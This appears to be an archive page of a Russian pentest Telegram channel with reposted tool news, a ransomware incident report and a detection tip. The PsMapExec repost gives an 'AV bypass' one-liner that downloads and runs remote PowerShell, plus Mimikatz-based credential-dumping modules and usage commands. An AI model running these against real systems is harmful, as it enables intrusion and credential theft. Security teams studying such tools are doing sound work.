en
Feedback
Fsecurity | HH

Fsecurity | HH

Open in Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Show more
2 061
Subscribers
No data24 hours
-67 days
-630 days
Posts Archive
sticker.webp0.34 KB

Ролик уже на канале 👾 https://youtu.be/AhWm7KHDtDM

Repost from haxx
📖 Тем временем в NetExec (nxc) подвезли поддержку протокола NFS. Из функций сейчас доступен энум файловых шар (права и файлы
📖 Тем временем в NetExec (nxc) подвезли поддержку протокола NFS. Из функций сейчас доступен энум файловых шар (права и файлы рекурсивно), погрузка и разгрузка файлов. Базовый энум
NetExec nfs IP --shares
Рекурсивный энум
NetExec nfs IP --enum-shares
Забираем файл
NetExec nfs IP --get-file /home/user/Desktop/test/lolkekpohek.txt lolkekpohek.txt
Заливаем файл
NetExec nfs IP --put-file lolkekpohek.txt /home/user/Desktop/
🔗 Где почитать подробнее: Энум https://www.netexec.wiki/nfs-protocol/enumeration Льем/качаем файлы https://www.netexec.wiki/nfs-protocol/download-and-upload-files Исходники https://github.com/Pennyw0rth/NetExec/tree/main/nxc/protocols/nfs

Так им и надо ? 🦈
Anonymous voting

Пицца достигла стола победителя, который своим усердием помог достать контакты жертв! Жертвы, в свою очередь, были уведомлены
+2
Пицца достигла стола победителя, который своим усердием помог достать контакты жертв! Жертвы, в свою очередь, были уведомлены о необходимости сброса сессий. Сам скам был нацелен на владельцев различных каналов, предлагая покупку рекламы под видом крупного бренда(ТБанк,МТС). Из-за того, что бренды обычно покупают рекламу через агентства, бывает невозможно провести проверку через рабочую почту. P.S. По счастливой случайности база перестала работать 😁 Виной тому — работа от root 💁🏻‍♂️ Спасибо всем кто не остался равнодушным к этой истории 🫶🏻

sticker.webp0.34 KB

👾Завтра ролик ! Был обновлен Obsidian Pentest 💜 🚀 Коммит обновления Приятного чтения 📖 Наш Discord сервер 👆🏻Тут можно пообщаться 🦈

Repost from Pentest HaT
🔄 💻 PsMapExec v0.7.0 Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell. UPD. Начиная
🔄 💻 PsMapExec v0.7.0 Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell. UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac. PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF Изменения в v0.7.0:
- Updated IP and CIDR handling logic - Updated LDAP query logic - Added additional groups and logic for when parsing for interesting users from module dumps - Fixed SessionHunter output to not return the created Class - Added layered encryption to the new module additions - Tidied up some others bits around the command and module logic section - Added Toast notification for password spraying - Added ticket expiry time to module tgtdeleg - Added -Module VMCheck. Simple Module that checks if the remote system is a VM or physical system - Fixed an issue where inaccurate data for machine accounts may be parsed with -Module eKeys
Текущая поддержка методов (протоколов): 🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL 🔵Kerberoast Реализованные модули: 🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов 🔵 ConsoleHistory - история в PowerShell 🔵 Files - файлы в типичных директориях 🔵 KerbDump - дамп Kerberos билетов 🔵 eKeys - дамп ключей (Mimikatz) 🔵 LogonPasswords - дамп logon passwords (Mimikatz) 🔵 LSA - дамп LSA (Mimikatz) 🔵 NTDS - реализация DCsync 🔵 SAM - дамп SAM Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
💻 Github ▪️ Documentation #soft #pentest #powershell #psmapexec #activedirectory #windows ✈️ // Pentest HaT 🎩

sticker.webp0.20 KB

Наш Discord сервер 👆🏻Тут можно пообщаться 🦈

Repost from purple shift
И снова ловим вымогателей, использующих связку Lockbit и Babuk. В новом инциденте атакующие получили доступ во внутреннюю сеть жертвы (организация А) через атаку Trusted Relationship (T1199) и закрепили в сети уже известный нам инструмент для туннелирования трафика – localtonet. В процессе разведки инфраструктуры атакующие обнаружили в том же сетевом сегменте домены ещё двух организаций B и С, где домены оказались с доверительными отношениями. Так злоумышленники получили учётки из доменов организаций B и С. Но атакующие не успели пошифровать организацию А: её защитники вовремя заметили подозрительную активность и экстренно отреагировали (погасили сетку). Заподозрив неладное, атакующие попытались развить атаку в другом направлении. В этом им помогли собранные учётки из домена организации B, а также VPN без второго фактора. Атакующие незаметно закрепили на одной системе организации B новые инструменты для туннелирования: cloudflared и gost. Однако быстрые коммуникации между организациями A, B и С, а также знания об атаке на A и новые подробности из B и С позволили остановить атаку до импакта – то есть оперативно повыключать всё, что могло зашифроваться, и в рабочем режиме исправлять-защищать инфру. План шифровальщиков на этот раз не сработал. А вы готовы к таким выкрутасам? Проверьте эти индикаторы:
argotunnel[.]com
*.argotunnel[.]com

Repost from Proxy Bar
DOCKER# Privilege Escalation * From normal to R00T user using this simple technique ! #dicker
DOCKER# Privilege Escalation * From normal to R00T user using this simple technique ! #dicker

Repost from Blue (h/c)at Café
💊 Небезопасная совместимость 🖋 Пост преимущественно рассчитан на соковцев, но и остальным полезно знать. Только не красным, им эти знания ни к чему, разве что мне работы добавят 🍞 Есть у микромягких такое качество как "Забота о пользователях". Верите? Вот и я нет. Тем не менее существует такой механизм как WOW64 (Windows-on-Windows 64-bit). Он даёт возможность 32-битным приложениям запускаться на 64-битной системе, перенаправляя их запросы, если таковые имеются, от файлов в папке System32, к соответствующему файлу в SysWOW64. 👍 Соответственно при написании правил корреляции с привязкой к директориям, вроде C:\Windows\System32\, надо не забывать про артефакты, которые нам подкидывает такая обратная совместимость, а именно:
1. C:\Windows\SysWOW64\certutil.exe
2. C:\Windows\SysWOW64\schtasks.exe
3. C:\Windows\SysWOW64\cmd.exe
☹️ И так далее. Даже если мы отслеживаем запуск утилит по их путям по умолчанию, то в легкую можем проморгать запуск их из подобных мест. 📕 Раз уж заговорили про "подобные места" - то же самое необходимо помнить и про механизм WinSxS (Windows Side by Side). Данный раздел предназначен не для совместимости 32 и 64 битных приложений, а уже скорее для хранения различных версий системных файлов и библиотек и обеспечения стабильность системы при одновременной работе множества приложений, требующих разные версии одних и тех же библиотек. Но мы здесь за другим - принцип тот же, но вот пути уже могут быть уникальными, но необязательно. Если кратко, то на двух устройствах с идентичными версией Windows, обновлениями и компонентами пути будут совпадать. Пример:
1. C:\Windows\WinSxS\wow64_microsoft-windows-commandprompt_31bf3856ad364e35_10.0.19041.4355_none_0a1b90d903f78201\cmd.exe
2. C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.3996_none_e7e7d1c1ebfac592\powershell.exe
⬇️ И таких примеров сильно больше, чем я указал. Более подробно об этом можно посмотреть здесь - Доклад с PHD2 #blueteam